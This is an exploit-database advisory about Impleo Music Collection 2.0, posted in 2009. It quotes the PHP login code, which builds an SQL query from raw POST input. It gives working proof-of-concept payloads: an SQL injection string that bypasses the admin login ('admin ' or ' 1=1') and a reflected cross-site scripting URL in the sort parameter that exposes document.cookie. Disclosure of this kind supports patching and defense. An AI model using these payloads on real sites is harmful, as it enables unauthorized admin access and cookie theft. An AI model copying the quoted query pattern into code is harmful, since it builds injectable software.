Impleo Music Collection 2.0 (SQL/XSS) Multiple Remote Vulnerabilities

2009-06-24 / 2009-06-25
Credit: SirGod
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-79

[+] Impleo Music Collection 2.0 (SQL/XSS) Multiple Remote Vulnerabilities [+] Download: http://sappy.dk/impleo/download-impleo [+] Discovered By SirGod [+] www.mortal-team.org [+] SQL Injection ( Auth Bypass ) - Requirements : magic_quotes_gpc = off - Vulnerable code in /admin/login.php ------------- $postbruger = $_POST['username']; $postpass = md5($_POST['password']); $resultat = mysql_query("SELECT * FROM " . $tablestart . "login WHERE brugernavn = '$postbruger' AND password = '$postpass'") or die("<p>" . mysql_error() . "</p>\n"); ------------- - PoC Login Username : admin ' or ' 1=1 Login Password : anything [+] Cross Site Scripting - PoC http://127.0.0.1/[path]/index.php?sort="><script>alert(document.cookie)</script>


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top